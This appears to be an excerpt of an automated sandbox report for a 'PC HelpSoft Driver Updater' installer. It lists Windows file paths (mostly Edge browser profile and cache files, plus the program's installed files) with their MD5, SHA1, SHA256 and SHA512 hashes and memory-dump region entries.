| SHA512 | a974144647f7d5b97b5f5c183763d1f8b3583223ef47f9d0fab893d35273c4fc7dc953f0aa1ed67c2f9c2d798352b092d425d6d9755582de9ed5cc472c1c282b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_en.softonic.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 655a768a0876d6df81dcc9a1671dfbc3 |
| SHA1 | 46cd55703db4ea1631fef0a91f0b39cdc8dee0b9 |
| SHA256 | b6c118dbb84fd7bc2b798aeb31f25b865e57bedee137602f70eda0c6a1923a80 |
| SHA512 | 32285a0ee8f58b55bf7e2274ddbd52ab9a11664c98e3b0c031d043a4938fa1995cfa4980fc7f53cdc5da9a46b4e866a088eb30adfaf5a221238ea4b8a5537ac3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000068
| MD5 | 167fcaeafccc88fab8e150fa5ed40267 |
| SHA1 | 2d1c317a5f5571ed15c68a0fd2bd78fdf5b70af5 |
| SHA256 | 8c15699fa7590a6df83be587560f58044ba7ab55e744971b6040b22007d1d259 |
| SHA512 | c24644d3a1de7e8d8d8ed223737cf40c98cb0a857ae692b2631cece5f8cbea246055bf09445b5cb4c8f6d74d2030842efefbb5ff518b7db0ea8195e4cd811efa |
C:\Users\Admin\Downloads\Unconfirmed 345684.crdownload
| MD5 | 60eadf6552fb282c9dd437890c0b5e24 |
| SHA1 | 11d401803530793093a7e01e54ad627d72b3065c |
| SHA256 | 0e056015ea77714ef6307709779bc9b7ade3a0e3e730d6cee39e298056d9811b |
| SHA512 | b4cc19f0ac5f333c73b1cb592276243f64ba44ba8b81e61bbf3d475c822b2faa18dad48a9795e6589c97ae12d4ff6c2de3a4d207ac3aae7ad4684d66d72916ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 65fe0abcb03f1d97ffbc8fd01db11f1a |
| SHA1 | f9a8a70a36c5935d3a83b7d0ad9f7db5846c4f0e |
| SHA256 | 22c1d64bb8d2805a26950ea6b84d1041c7a4481bb3deaec40e347bb8c3918c0c |
| SHA512 | 0df17632521ff032cf899bcb56a317811853fe317d5c2660843af7dae0f4ce5b1486a855e205a77b2489fe7fa1d4758fefd8d11aa71802716e45eccf2df43f30 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\db60c1ff790d411ae2c665c394ad731653fd3a20\db854608-0eb6-4d57-a6a6-8652e8a4ecbc\index-dir\the-real-index
| MD5 | b55a51e546f57b6027857fc5a1ef61a9 |
| SHA1 | ef37482189083567778ba179f15477f0d1a9db1c |
| SHA256 | a76844f5bfe27b466ebe874d13540c97b6878ccc1fc417febfc0539c423d8221 |
| SHA512 | a35008767971c3c4e0803705b6ea6bf3d7ee925f08753d59b9c1a032f286b88160bf37a7532dbd757f0f4b8297d2b3f567fede341084fcac616380ec4f3e48ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\db60c1ff790d411ae2c665c394ad731653fd3a20\db854608-0eb6-4d57-a6a6-8652e8a4ecbc\index-dir\the-real-index~RFe5a496e.TMP
| MD5 | 89cf045325da1d45d861cd12454f9f62 |
| SHA1 | e244d29d65abeff2bdacf7412c7cb57601f7e24d |
| SHA256 | c395526ee2deb81fcb696692536bbb51633bd17560c90644bdae87c742f09e23 |
| SHA512 | 73965aacdddd60248153161a62db754f6000724422f63357922b57a12517c0e2fd307ea42ad79fc474a3cbf515cd5697035130ca435c45a8f7aceb16aa386fa0 |
C:\Users\Admin\Downloads\Unconfirmed 34330.crdownload
| MD5 | dba533edfe91246318f3baa8e2efa47a |
| SHA1 | 63e0789a8169ee6f1f58e0562feb41aad9d24591 |
| SHA256 | 5a31e3fe32f6c77525512f701a4b321432050b99d2772b6556efb361fa28c71e |
| SHA512 | 26639c83fbc575c0438857117c97f21bb58b0066789878b405cf2ab1eb1da410ab9e595cc84cc41a4d95fd0cafb2874e7696cdb69f7c8ee565e982715babe7df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\db60c1ff790d411ae2c665c394ad731653fd3a20\index.txt
| MD5 | 694b3d3e3618a4540668727712bf3e36 |
| SHA1 | 77e2b61768a158fc1b823b3b7e27f5b484c0ea17 |
| SHA256 | e2818754ca21179cb872e21a8cad22477ad5dc8d85fb8f7b2f3315d902cce565 |
| SHA512 | 7e3d257bf7e642ec3b5c826e967061245c9ffc305a03f2b92952cb7aee996ceb8dc2878bf4c18b76b053e484d1b35a833115ecd7358af64cf033fac1bedc5069 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\db60c1ff790d411ae2c665c394ad731653fd3a20\index.txt
| MD5 | fdf046c97681113bc18e270a29047866 |
| SHA1 | da146d855bc7821a3f614b4da1675834f10fdb4b |
| SHA256 | 191a8da4c4ee250ef897e202fd4eaa4ee4bb017ceca9c3d4361fecf35cfc090d |
| SHA512 | ed40c5dadaf850addb1854fe8853f76e90c18d6ef359a2f8b3e3e8ec50b0da1edfd242adfb0ac1d6f0c31ef564831ea21956a216429f296998bb4eaf0cdf7e28 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e9605700e518947fb1896fd8f043eacc |
| SHA1 | 1991ab19b48a0cfdda79fc03e1597b0e94372658 |
| SHA256 | de7a9db13da776c4ed6ba4c0f562e32f149138e6ba487a8978b2ad84872b4543 |
| SHA512 | e863bbb1cdd5b654e7361147972b5ad8ef6720f59daddd3aeba9fe895ccedebed4edbdd63ad90803de1ae61bc575ce30fbe34204bc87b94726567015fc71c274 |
memory/5956-2286-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/4156-2288-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/1896-2292-0x0000000000400000-0x00000000004D3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp
| MD5 | dfd93de42e9578134afa014f60acbe36 |
| SHA1 | 9a0e08fd5122a5f7688b05868aa51e4e2c69a647 |
| SHA256 | 9d2d3263a5b32dbb2dd9532aa571c1e07da9a2df228e5389872df126126bdabc |
| SHA512 | 4b6858c06a93e107e9854d4e5892da171d28c069fe7cea465c66e9e5dbb98285d165bf50281d8d00390263b99323222bc7c87017bb24c90c6529a3406faa0100 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a7bc9.TMP
| MD5 | 64ca5dd0830eb9353a72e4b256520e3c |
| SHA1 | 87e7ca63c3e196fdf8eb9f5d8bd36b7af876761b |
| SHA256 | 32517775f4b864b3e01bb6ead77dcb3c41c8dded58e090f0b8eaa10a4194fdc8 |
| SHA512 | d949797058cc1332ee89e49217e2e01cfc5eafedad522633ea4853d16d6abb6ed862a113c18dfc8f4a2f280cb63dd23d9336bbf76c3eb23acfd6d50c063ef40b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | c3c50d5e26463c50ffcc1c3334b88d1d |
| SHA1 | 7da057226e29a80c89a88591c982e5cd3a03dc12 |
| SHA256 | cdccb911f3704eab90ecdb27038dddef5d40826edcb50a5522211303eae60978 |
| SHA512 | 3e288b27d85ddcccadebf6e9a4022e4000e7e10a8c9bf5dd2222eec7f804b53dc9b676fa2fae59be88c625d80cb6e70e74895f206568ae89b8b147bb56b96be2 |
C:\Program Files (x86)\PC HelpSoft Driver Updater\sqlite3.dll
| MD5 | 842e8edbfbeffb9ef234a2da6d5980fe |
| SHA1 | f76e944e5ac3c489d987a11a313b41dee3e813f3 |
| SHA256 | ec30f1214fa645b8e436142acab6cc9a07f5c4e3414b5e539a832df9237a7bb3 |
| SHA512 | 1ca9449dffa72b274b842b3a1f2008d3f13c6f423e7ac466e2efb97fe2103e1aea052a5e8a9839083061154fb61ec870fbe8e35164b386a3aa0aaaf8064a0ed4 |
C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe
| MD5 | 21a4dadd5686773fe0ef880c22f07d38 |
| SHA1 | 6236e9ec7eee10d95b3055a5e473fd2656898469 |
| SHA256 | 76ec2ea23b6d6cfd69699822a95e9032b9ef8100df19be91357c4e71a1f33b37 |
| SHA512 | e8dc6bec5347f6d83cdab1df7683abc0d563603ea08dcd5acccbdb6ac3a6efdbaa88dbdff5c257251eaa1c5311947a581d4a2bd506cbf3fbddba1e46471683c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0c130e4a09b717aac4a878f04d8095e9 |
| SHA1 | b460167ef8b0d3ce78d18dd1f070eef20fec52fe |
| SHA256 | b62db3d8d4b7a11fbfe00a17923d48e7e61ced9a0e1ec3e49c8fed75ab1ade96 |
| SHA512 | 0106bbf5c25f106d8d66607353594c22f59606cc5f5a49fbadfa12f43dac5a8099a11587f8734baa4d3cf33b7389f4af2ace9c491060498f6d65148ac1246a4a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9abb07cb1932217ec05300f78cfc93f2 |
| SHA1 | 2d4371c4a14c6d638d94895ffd461ce1505ebb12 |
| SHA256 | e9dec0ef3bb048cd597e9b2150afcce98aea1b6a321813ab76d7dc433ba2940f |
| SHA512 | d231625486fd91dd8769f1abf4b977e12cb244aeac642f35a7f300853881ebb17ab8c545ef6c8fb9489ce8af4f5e1e21b449fa669db5a005e62ce08857adbd84 |
memory/1036-2444-0x0000000000F40000-0x000000000177F000-memory.dmp
memory/1036-2445-0x0000000060900000-0x0000000060993000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5688fa60bfd59d66a42702f220ec5c0a |
| SHA1 | f5a4db5223052f45a1852c9506b702c7cb85d967 |
| SHA256 | 18bd46ad20212350ad43ff4d1c8ce945b08c0f3c2620088caad4c10568a2b4ec |
| SHA512 | e8c32fddd6b21f7cc070b3d935c2cc312b0e856b53e733b76da0c9380ae6d573dae2a77ce638cd895d3bda6e1db5e36fba0463e9c506af438007ac33c8541cb4 |
memory/6988-2476-0x0000000000400000-0x000000000093A000-memory.dmp
memory/6988-2477-0x0000000060900000-0x0000000060993000-memory.dmp
memory/4436-2479-0x0000000000400000-0x000000000070F000-memory.dmp
memory/1896-2480-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/6720-2489-0x0000000008E70000-0x0000000008F72000-memory.dmp
memory/5956-2497-0x0000000000400000-0x00000000004D3000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b63cdcfed2682068d85490191ac5b0a2 |
| SHA1 | 4258fb79f9cf077fcb66885a6151d5e716fe8e77 |
| SHA256 | 5fd4090a874e11078c87cb85b4191246cb953aec7fbeb94ba0024299ca3334d9 |
| SHA512 | 393e2e20fc3d12c2b9c1592548f988f96664beadc83d37588fd6dd5f268e6727721e68946a148cab26165e08f354bf2f6e700b3ccf9d826f721758e1a72690af |
memory/1036-2562-0x0000000060900000-0x0000000060993000-memory.dmp
memory/1036-2561-0x0000000000120000-0x000000000095F000-memory.dmp
memory/4156-2565-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/3972-2588-0x0000000000400000-0x000000000070F000-memory.dmp
memory/4448-2596-0x0000000000400000-0x000000000070F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | de8635a9b7750167fc04b2017979e949 |
| SHA1 | be934a7959ca6b6e4aa3d8c601647b95fabb47af |
| SHA256 | dba4e498bf82667d4b7a4f438121a679c2f1946778741b001bb2c48beaafc9bc |
| SHA512 | 118ddd99b840a9230a32e5b44554fd9b8c0e2ed165f46d6a9da66e6b112307f05473e10517ef7ef2bec6de171fdfc265095a21d1c8dd89819c135348cef025d3 |
memory/6720-2620-0x0000000060900000-0x0000000060993000-memory.dmp
memory/6720-2619-0x0000000000F40000-0x000000000177F000-memory.dmp
memory/6720-2621-0x0000000000F40000-0x000000000177F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 937df9623459b3ca1b25a81ef5c46a5b |
| SHA1 | aa1612c051d4c01b254711830b4ff7134aa3ffb4 |
| SHA256 | c189f23136d4db9c9c1a6a8ef6ebf574b32c1a5a64e2b298cec9c4651f09ec57 |
| SHA512 | 122faa6cea75853015e410328e4182a80a0392230c40ffcc6e2493ed7bf1ecbe0513c2292908298746d8931965dd1a0bf0b3fb40527581e440531dd64b3e5f34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 397114a8ef8d1fde03829d7e6f166d52 |
| SHA1 | d7395ddef90cc59b6ce50688c9b46eeffbe8adfd |
| SHA256 | dfa9e9037dbf8b36e635c36b5a82e24b1ba3933aa056ffd97b84ad8543dc9d21 |
| SHA512 | 05f9f13c05e46e620980201033506c7724dd06c63fcefa9bf2064cf4d3b628ebbbe068528e3a29002c97d0e3740974ca8248afff747818fb41d911d2021d44ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9f2cbf70837ff7b59784369ecc01b1af |
| SHA1 | 6b491dd20b820b5218db558646468e573ad07385 |
| SHA256 | 36064b7626bd455dfc1ab7b4949e3fe644462584ed718451b286be46ac75a5ab |
| SHA512 | 35e1e9fb688fbb7d7be7db64c36d8907c6451635e63277e040074eae37d55d118a1d384c557eeeaa8e6b5bc2f29a9c76d04bf7d1e19e254ce13519d28e5f2210 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d20fd29fdb28f8f19d18ae6b053531bb |
| SHA1 | 92510698f444ed9ce21fa35486daf2f2ef1e5f89 |
| SHA256 | 759e5bec3dab039ba460650cb010e9d950a2e13b9dd4e46d77b020f42dc2c5ad |
| SHA512 | 39795d8bbecc28c9237b4740ef0807bf91653e7e36d0c3c327fb795ff84aef73680fe9a4c3a6d630f9fd45a92190d2a0e12465cd7ca10ac199ae6327aeffdb21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\35a45aa4-7c05-4705-9e42-faaab793b607.tmp
| MD5 | d571737a8269dd5dc6f87eee5f8ab660 |
| SHA1 | 0e5e5ee42c9127ceef623e2593c65af5127de231 |
| SHA256 | e935cababdc1ca034223503c22ab271c28cc0d654d3914b87f7f689e072e6807 |
| SHA512 | 51743a79403feb573d26071aec291fb13d81fbe5c2146e994dd6e352c065567672234082d6b82e3e93444c6223b419a2c6c07570db92e46c6cd3817afb5a1f7f |
C:\Users\Admin\AppData\Roaming\PC HelpSoft Driver Updater\26E484A9F1BFB5EC9DF0894433ED102B521E889E.7z.status
| MD5 | cf25c42f45a3fc92adb23a4fe24daecf |
| SHA1 | 2d52571ca1837e970538cabcc3c8fe78ae32ca88 |
| SHA256 | d25a2b6fd3c55e9a3932ac6290dd1729f02c90bdffd7cad20661ba20505a06a0 |
| SHA512 | a2ba4d33b442053030e8233af7bd64dc230343c8720f62228bb687bbaae5fea805b479e0b7eea7d8bc0ab0c84122b0733859f024ea77d4b4df59dfd0796ac00d |
memory/3316-2730-0x0000000060900000-0x0000000060993000-memory.dmp
memory/3316-2729-0x0000000000F40000-0x000000000177F000-memory.dmp
memory/6720-2841-0x0000000000F40000-0x000000000177F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 612bc56816062572b0bf80767c256f0d |
| SHA1 | 9e5c9d580cf2787e9671a8ddc7ea358f0890609c |
| SHA256 | 759d876b6a7deed2e6f5e0286e3b864270fe5e437d5fc0e0e1a3815deba7f434 |
| SHA512 | cfecd15f8b5632cc96f48564e77443c63b64e88e6a1b97243ee799e936def578e8ef94dc7c8517b04314b55271b4c8d72c8ae2320750cb590af2411044057071 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | bdbf0f28d444e07a1caad151ba4fb737 |
| SHA1 | 8725478032393881b3c208d8604243c8eebf361d |
| SHA256 | 769a8cf49500e6395bf36dd38b500ca3bf8647eb72440c34956ad9c902aae56a |
| SHA512 | 8271a49547f8f94545e984a564bb423124d60961dba497b9fa9e35a703d869ae7d4ee9b6d106553936c0095360a837a37bb07b3d0d1c90d99d35f8f901e53be6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 778620dd2740ce5867ef9588068a4212 |
| SHA1 | c595f05e5b22e99b0d9e1b7d5c500a59d5cdb848 |
| SHA256 | cb8f7110a487c4000ef6e9899468ee7af17fc6bbb4bd12a24d4d3d604b965f9e |
| SHA512 | e729c5436c1ded73208caae9b0af5670cd18400de2c3982fc78c8acfc95c98344a7c05c1f5f7203077425236152796778b7179218c701e51341126cb9cacc56b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4a0d3f463811ffa34f9f012cbfc38f94 |
| SHA1 | f5f4c6a6a7d880dcca60cedbb76fb2a7fdb551f2 |
| SHA256 | 331cd5e9f1624643bd0154e3781d446bfadd6ce2538c6d47dc29fcc6a267028e |
| SHA512 | 997598f2cdb565b9f641ee3fb903f0cece570d4db791efae289cb1fb84fb842533265d472554091a58e977b55913da5970c9b402e4db1fa48cfe993aecffa024 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a3ff59a6c3c333d78685cb76e7a8e84e |
| SHA1 | fb9dee388f5177df2dfd492c8cdf8ce8ea2f1316 |
| SHA256 | 243fd1298448c365cae3583ea89c6fee4f7dcf071e1374b56a45cebd663d64a4 |
| SHA512 | 7ed7848241eb02a2cf93b63a27fe5d74a32fd8e43d9fe50d7316bfbe70b80b4ca9b8646901fc77bfad402e83f1f94851f2bfd9f6fdca1599d1eadebe81af93f3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000ad
| MD5 | 015c126a3520c9a8f6a27979d0266e96 |
| SHA1 | 2acf956561d44434a6d84204670cf849d3215d5f |
| SHA256 | 3c4d6a1421c7ddb7e404521fe8c4cd5be5af446d7689cd880be26612eaad3cfa |
| SHA512 | 02a20f2788bb1c3b2c7d3142c664cdec306b6ba5366e57e33c008edb3eb78638b98dc03cdf932a9dc440ded7827956f99117e7a3a4d55acadd29b006032d9c5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | d25f68d57df5f9682f29f58af39f503b |
| SHA1 | 045881e89f26813092175086579a19607993ddc3 |
| SHA256 | d458d4d2bc7e7e540c527bfd9ce73424cfb6d0ebeb07ecbc17ec65ffd5a7b0da |
| SHA512 | 5e1aa004f8e0e01b3422bfcaf3bbabe401e7e482bb3a547bdde39fdb2965e825114b7c4849396749dec030582445e5073cfd4494db839c388d961d15f3fc87b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 20a0cd267695a326bb4c85dfac0568b5 |
| SHA1 | 0ff5d03e4f52625ce6204dcd74b398c14f4652a9 |
| SHA256 | 15defdc807b3f79f68aec26f416e7a39157c054fa432637ccd4664163255e749 |
| SHA512 | 16d8e35c83813e2c9b90df595cbc97801082daf40d8b186d17a4c04aec69248c2894169f7ce4accb7d2d9d5dbbe612c53f340e4f1075a8a46d94ed11d73380ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 886d7f8ad6f342bb585024a7804964db |
| SHA1 | 20fe0ff3b79d847af72946a79cb9c73c08f4abb9 |
| SHA256 | d9445e7ab93ae2ea14b3fb289bbf7aa72744fd46ce48bcfcc1f29fe7d6cd0a0d |
| SHA512 | f42b510a1846f8bbc039ce5c02979ae0bf7a631c9e2cb2660df767a3b7ef0ff549cdb47e0182d1d00bfbd369b7daa8e6b69c5d48460c6d03ad2fe5d2133e0a3b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5e774010d4804e6ffa60c4b2d3216981 |
| SHA1 | e9201b64654ccbce02b7becdfade219039224e3c |
| SHA256 | 3c0e9cae41d3dec537cb1a3a2c64684c4f8b43d6dfef92e2bd2c1e99154399b2 |
| SHA512 | 27ffee21769f03f58c817a4ae3fa6d13d12c67a090bcceb6bf02b7d50ed52138e8ea86d6a0cff2212dba4378a14980131b51e2159e0a2cd45753eeba798596c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f71cd865035add8f733724dc63868452 |
| SHA1 | b6e97ac614ffe466a8fcf19241a901b6ba6af612 |
| SHA256 | 6dd909ecad37dc056b37cfd8fe415b5c731d9d378a2cf6f55cf37ed53551019f |
| SHA512 | f063817fc83dd9d4b7b82d7f2211cd7de747f75c4db37b31c17a8fb13a44081fb66b5d53b553b3b6a35be26c13e7b15e384135f70500e5521ca0951e90fdfe3d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 81e284d33acb31f0cd5f8fa69c2602d4 |
| SHA1 | 0b3d27bc2ec639d1c6d967b6ba59017c945557a4 |
| SHA256 | b02f643998a14eda9b456a3cbbaf854f3e4173281b6851f3995c8c77e7fd1fec |
| SHA512 | 142f071bed9bed66833822ae68d2d3eaf96a086f83d1c36771bdc534dd1304b7274ebc78c5e5d0394999394fc3ac88cdd0df1692d2549b7f08e48d3909e32020 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b0977752987ee7a9b006e22f7901b01c |
| SHA1 | bed50bd79e24eccb2c05242167084ab71b2edfc3 |
| SHA256 | 84322d07ad546e016ee96b94c1689b4497713576c5664cd669fb273b18acc1d1 |
| SHA512 | c1589727db11800e8665e2e832b9c578db0a4fee5bde8944a2a30f9c0564b3554edbf8ba8417678ee3bf670d2aa807caad2715b5d152595ef2dadea5ebc095f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Roaming\PC HelpSoft Driver Updater\program.log
| MD5 | 91eb424016fa10bdd7d4d4c78650e8eb |
| SHA1 | fb3bcd547fc60d2002179abaa1502b6662978f07 |
| SHA256 | b08a9a35a71745554c5f1b3a6635aaf2a6207c7ef0fa2f87db0136917e200f0f |
| SHA512 | 558415bd67f5c92faf01bf42f451323d0c414db09a9b996f40936fb24e47b6b4a7aa88627cf8d2a0d1bb557df1663d4e299068eafbd6914b50bcb5b3c43f9dd1 |
memory/5304-3297-0x00000001401A1000-0x000000014068C000-memory.dmp
memory/5304-3298-0x0000000140000000-0x0000000140EBF000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d51ff809c13a3a8786200df9bee461c6 |
| SHA1 | 0fb181991213106daa55e4f886afe0fcf4241d74 |
| SHA256 | 946e00c2ed8232c56ba48d691321f2df1788ccc45a0f908e7c57dc82d626f0d1 |
| SHA512 | 65765026429130a5854a347b1d31ea9a5e6cd12cd14be3e83b5c620ad96c6fc73d34735fc80b8308bf5d19036525e4dbf989d395e4c45edfa179e66459b8ec4d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\84a0db7b-cb3e-4bc6-a165-4c4f30f295f6.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 956f4506231bfa76aba88e515f18b7eb |
| SHA1 | e0766b0c82086b60c880583af662b19373f91e36 |
| SHA256 | 2a5b9af12283fd873c4e4ab4fd93d13cbf94bb0701454151a96258a0d832e203 |
| SHA512 | 37fe0587a692c8638f6433a23c414ad8d84c626564deea136d942d38e611a73ab93f09dc8d95503da635ccf6dac64ff8e9b64eca409211e487ea033becc160b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8a1470b97374e5aec245c1d50cb0b8f7 |
| SHA1 | 41ad27a7932d4f7c9ef60227025f352821c4aa02 |
| SHA256 | a038e9849fa6080e1839872529f9ffa9907489022f0399f82ee76cecffdc74cf |
| SHA512 | 5cd8cbc0c2db38c65847b78a01a5acc2d2d3d8cc85ded4692e38bce9726ea5b503caad1c665dfed41362b1d7a7e5f9aa4f092e0f179dd172255c1bd9445c2c8d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1db41a2c4a11587342ac81084f0f31b2 |
| SHA1 | 1d2af20c024a015b33f40a343bfb5400854ed3d1 |
| SHA256 | 13a16f271c162cee7252758be4827bb0bf22edfbf95ec02c0aebf2f9807ea5f2 |
| SHA512 | e1e7e834292d7da2765e5e55d81b6a7d66750baceae331abd5e99569f50dde472da5dd6d4ef8c7478b9b89c285a080c1a6cfe3ab7ea506af74262e68cbe26b40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000c3
| MD5 | 6eda9c4c61b12b37c9d4aa16cce03dbd |
| SHA1 | 61bf85d92987df7a639d9acacd94cb6a36a7c515 |
| SHA256 | 65aa52bcac42500ccd2048b39588f0190a18d5df77b36370fd7fbdbb1ea3e8e1 |
| SHA512 | 58cf49b44fa819f502b93eac1ff1bc2d6465653a82d0a413e9f08e609b48cc762e70cc987366fec52bf8afa0e6afb6287d0cf5f4a5b82efc5d482e6d3ecd9a7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b7e346dffaab9f19f814f288de051aeb |
| SHA1 | 2ec37cad748026fd1c77d2efa5dd9d45d6fd8c48 |
| SHA256 | 36ea4653ccd0bbff38b1a4f4d740fb2f9d989e02221932cb6019878a8dd60c65 |
| SHA512 | 35f389a01e2bc83039dfcf5bdc363b121d664cbfdf09e5a71f1bb7eefcb8d3bb2832454130416a0148857c2c40ef27a0016b2b754f8dded32f86c8012b38f6e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000d0
| MD5 | f70baa579d763f4bc2df9911cd97f38d |
| SHA1 | cb6ff1124c247215383843cb88bf36473aac769f |
| SHA256 | 69c6971720ae95f2ce455328db7afc3b142f1c2861abe1048a48c6efe72c1816 |
| SHA512 | 2b320b07715c8326f870a649853aff109d1bc3fbd4b7e79363dcccb79a42d3ad6302e56ef95d769a3a37db7a5c606164cc2098f6d3e4354d04ba2b197dbdf775 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d33f2214b0cef22f10f724683ebd5523 |
| SHA1 | b405259fa90cd9fbb008333078246923edf03788 |
| SHA256 | 16dc4a23a48c0a46ecf1f724e3caba513deca8a77455326c4192286dc589cd8c |
| SHA512 | 6f7fbd98688452e9d5975144a36c1d1660d55635df980a253a58c97e2500ba33f1bbfa3222d11a6f134cd930e705d47d29c89cdd6c63437adc5cd7899681005f |
